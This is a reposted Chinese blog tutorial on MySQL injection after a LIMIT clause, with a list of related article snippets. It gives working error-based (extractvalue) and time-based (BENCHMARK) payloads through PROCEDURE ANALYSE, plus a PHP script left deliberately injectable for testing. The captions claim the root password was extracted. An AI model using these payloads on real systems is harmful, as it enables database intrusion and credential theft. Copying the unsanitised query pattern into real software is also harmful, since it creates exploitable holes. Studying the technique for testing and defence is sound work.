[转载]Mysql下Limit注入方法

最新推荐文章于 2023-09-25 16:18:22 发布
最新推荐文章于 2023-09-25 16:18:22 发布
阅读量120 收藏
点赞数
文章标签: 数据库 java php
原文链接:http://www.cnblogs.com/lcamry/articles/5625412.html
版权

原文: https://rateip.com/blog/sql-injections-in-mysql-limit-clause/ http://zone.wooyun.org/content/18220

   此方法适用于MySQL 5.x中,在limit语句后面的注入 

    例如: 

1SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT injection_point

   上面的语句包含了ORDER BY,MySQL当中UNION语句不能在ORDER BY的后面,否则利用UNION很容易就可以读取数据了,看看在MySQL 5中的SELECT语法: 

01SELECT
02    [ALL DISTINCT | DISTINCTROW ]
03      [HIGH_PRIORITY]
04      [STRAIGHT_JOIN]
05      [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
06      [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
07    select_expr [, select_expr ...]
08    [FROM table_references
09    [WHERE where_condition]
10    [GROUP BY {col_name | expr | position}
11      [ASC DESC], ... [WITH ROLLUP]]
12    [HAVING where_condition]
13    [ORDER BY {col_name | expr | position}
14      [ASC DESC], ...]
15    [LIMIT {[offset,] row_count | row_count OFFSET offset}]
16    [PROCEDURE procedure_name(argument_list)]
17    [INTO OUTFILE 'file_name' export_options
18      INTO DUMPFILE 'file_name'
19      INTO var_name [, var_name]]
20    [FOR UPDATE | LOCK IN SHARE MODE]]

   在LIMIT后面可以跟两个函数,PROCEDURE 和 INTO,INTO除非有写入shell的权限,否则是无法利用的,那么使用PROCEDURE函数能否注入呢? Let’s give it a try: 

1mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1);
2 
3ERROR 1386 (HY000): Can't use ORDER clause with this procedure


    ANALYSE可以有两个参数: 

1mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1);
2 
3ERROR 1386 (HY000): Can't use ORDER clause with this procedure


    看起来并不是很好,继续尝试: 

1mysql> SELECT field from table where id > 0 order by id LIMIT 1,1 procedure analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1);

    但是立即返回了一个错误信息: 

1ERROR 1108 (HY000): Incorrect parameters to procedure 'analyse'

    sleep函数肯定没有执行,但是最终我还是找到了可以攻击的方式: 

1mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
2 
3ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'

    如果不支持报错注入的话,还可以基于时间注入:

1SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((selectextractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

    直接使用sleep不行,需要用BENCHMARK代替。 

 

    我亲测好用~这里附上我的测试代码:


01	<?php
02	header("Content-Type: text/plain; charset=utf-8");
03	require("mysql.class.php");
04	$mysql = new MySQL("test", "root", "root");
05	 
06	$users = $mysql->executeSQL("SELECT * FROM user where uid < 100 ORDER BY uid limit {$_GET['p']}, 10");
07	if($users){
08	$users = var_export($users, TRUE);
09	echo $users;
10	}else{
11	    echo $mysql->lastError;
12	}

  

  
 

    报错注入获得root密码:

    QQ20150124-4@2x.png

    报错注入获得mysql用户:

    QQ20150124-3@2x.png

转载于:https://www.cnblogs.com/lcamry/articles/5625412.html

weixin_33938733
关注
SQL注入漏洞复现:探索不同类型的注入攻击方法
weixin_43263566的博客
08-26 1386
基于错误的注入(Error-based Injection):攻击者通过构造恶意的SQL语句,利用应用程序返回的错误信息来获取数据库中的敏感信息。基于联合查询的注入(Union-based Injection):攻击者通过在注入点处构造特殊的SQL语句,利用UNION命令将其他查询结果合并到原始查询中,从而获取额外的数据。基于时间延迟的注入(Time-based Injection):攻击者通过在注入点处构造特殊的SQL语句,
mysql+limit+sql注入_sql注入limit注入和五种时间盲注姿势
weixin_28803437的博客
01-19 653
0x00前言limit注入和时间前面也提过一点点了,真的非常简单,真不太想单独写一个这个来水博客。。这里还是记录一下吧以后忘了方便复习。0x01 limit基础知识照抄前面的:这里简单记录一下我自己经常会忘的知识点,觉得不值得再写一篇博客去水了233使用查询语句的时候,经常要使用limit返回前几条或者中间某几行数据SELECT*FROMtableLIMIT[offset,]rows...
mysql注入limit 注入
Sp4rkW的博客
03-05 4398
limit注入基本常见的分两种场景,存在`order by`与否,本文将复现尝试各种limit注入的姿势与讨论不同mysql版本对注入payload的影响。作者能力有限,有更多思路欢迎讨论~
mysqllimit注入
cherrie007的博客
07-27 4548
[转载]MysqlLimit注入方法
MysqlLimit注入方法(此方法仅适用于5.0.0<mysql<5.6.6的版本)
weixin_34115824的博客
07-27 199
SQL语句类似下面这样:(此方法仅适用于5.0.0<mysql<5.6.6的版本) SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT注入点) 问题的关键在于,语句中有 order by 关键字,mysql 中在 order by 前面可以使用 union 关键字,所以如果注入点前面没有 order b...
mysql limit 注入_[转载]MysqlLimit注入方法
weixin_30394975的博客
01-26 366
欢迎来到阿八个人博客网站。本阿八个人博客网站提供最新的站长新闻,各种互联网资讯。喜欢本站的朋友可以收藏本站,或者加QQ:我们大家一起来交流技术!URL链接:https://www.abboke.com/rz/2019/1010/116748.html很长一段时间我、以及很多同学认为“mysql limit后的注入点”是没办法解决的难题,但这次真的被解决了。我很少转载文章,这次再破个例。原文:ht...
sqlmap注入mysql_sqlmap注入系列(高级篇)
weixin_42107561的博客
01-30 977
前言:软件:burpsqlmap软件配置设置代理打开kali中自带的火狐浏览器 点击设置 --网络设置漏洞环境安装数字型注入(post)篇利用burp抓包,将包中的文件另存为33.txt爆出数据库sqlmap -r "/root/22.txt" --dbs爆出表sqlmap -r "22.txt" -D lou --tables爆出表结构sqlmap -r "22.txt" -D lou -T u...
mysql insert 注入_SQLMap Insert注入踩坑记
weixin_39773239的博客
02-01 1142
*本文原创作者:Conan,本文属 FreeBuf 原创奖励计划,未经许可禁止转载前言本篇文章是在做ctf bugku的一道sql insert盲注的题(题目地址:insert盲注)中踩到的坑,觉得还挺有趣的,于是便有了今天的文章,如有纰漏还望大佬们多多指正。进入主题1. 判断注入点明显的insert类型的注入注入点在X-Forwarded-For,但关闭了错误提示并且没有回显,因此只能进行时间...
concat mysql sql注入_Web安全测试学习笔记-SQL注入-利用concat和updatexml函数
weixin_42097668的博客
12-29 394
mysql数据库中有两个函数:concat和updatexml,在sql注入时经常组合使用,本文通过学习concat和updatexml函数的使用方法,结合实例来理解这种sql注入方式的原理。concat函数是mysql的字符串连接函数,定义如下: 先来验证下concat函数的功能:select concat('m','y','s','q','l')验证结果:如定义所示,concat将字符串连接起...
mysql exp_(转载)使用exp进行SQL报错注入
weixin_35172689的博客
01-18 867
此文为BIGINT Overflow Error Based SQL Injection的具体发现与实践0x01 前言概述好消息好消息~作者又在MySQL中发现了一个Double型数据溢出。如果你想了解利用溢出来注出数据,你可以读一下作者之前发的博文:BIGINT Overflow Error based injections,drops上面也有对应翻译,具体见这里。当我们拿到MySQL里的函数时...
mybatis如何防止SQL注入
01-05
mybatis如何防止SQL注入
MySQLLIMIT 条件后注入
weixin_30535913的博客
06-14 158
from:https://rateip.com/blog/sql-injections-in-mysql-limit-clause/ 此方法适用于MySQL 5.x中,在limit语句后面的注入例如: SELECT [ALL|DISTINCT|DISTINCTROW] [HIGH_PRIORITY] [STRAIGHT_JOIN]...
mysql limit后的注入
ztaos的博客
12-04 631
mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1); 例子:http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0&num=1    procedure
MyBatis如何防止SQL注入
小小渔夫
05-22 883
SQL注入 什么是SQL注入呢?首先SQL注入是一种攻击手段,一种使用构造恶意的SQL语句,欺骗服务器执行SQL命令,让后台的数据库去解析,从而达到入侵目标网络,获取敏感信息。MyBatis如何防止SQL注入SQL中#和$区别#$相当于对数据加上双引号相当于直接显示数据很大程度上防止SQL注入无法防止SQL注入#{xxx},使用的是PreparedStatement,会有类型转换,比较安全${x...
SQL注入之order by注入limit注入
m0_46467017的博客
08-09 4738
MySQL支持使用ORDER BY语句对查询结果集进行排序处理,使用ORDER BY语句不仅支持对单列数据的排序,还支持对数据表中多列数据的排序。语法格式如下select * from 表名 order by 列名(或者数字) asc;升序(默认升序) select * from 表名 order by 列名(或者数字) desc;降序假设有以下用户表当我们使用命令的时候,是将users这张表按照username这一列进行升序,结果就变成了;...
转载Mysql注入点在limit关键字后面的利用方法
weixin_30393907的博客
07-18 180
描写sql注入利用方法的文章数不胜数,本文将描述一种比较特殊的场景。 细节 在一次测试中,我碰到了一个sql注入的问题,在网上没有搜到解决办法,当时的注入点是在limit关键字后面,数据库MySQL5.x,SQL语句类似下面这样: SELECTfieldFROMtableWHEREid>0ORDERBYidLIMIT注入点】 问...
MySQL注入秘籍【下篇】
大河之犬的博客
03-22 655
order by注入通常出现在排序中,前端结果展示的表格,某一列需要进行升序或者降序排列,或者做排名比较的时候常常会用到order by排序,order by在select语句中,紧跟在where [where condition]后,且order by注入无法使用预编译来防御,由于order by后面需要紧跟column_name,而预编译是参数化字符串,而order by后面紧跟字符串就会提示语法错误,因此通常防御order by注入需要使用白名单的方式。为MYSQL语句的结束符。
SQL特殊位置注入:order注入limit注入
fly_enum的博客
09-25 1264
平常在做测试的过程中,我们经常遇到的sql注入点一般是在where语句后面,但是偶尔也会遇到注入点在order by和limit。这两个位置由于其有一些特殊性,导致一些注入方式不能使用。下面就一起来看看这两个位置如何去注入
mysql skip limit使用方法
最新发布
10-10
MySQL中,使用LIMIT语句可以限制查询结果的返回数量。但有时我们需要跳过一定数量的结果,然后再返回一定数量的结果。这时可以使用SKIP(或OFFSET)和LIMIT结合使用来实现。 SKIP或OFFSET用于指定要跳过的结果...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值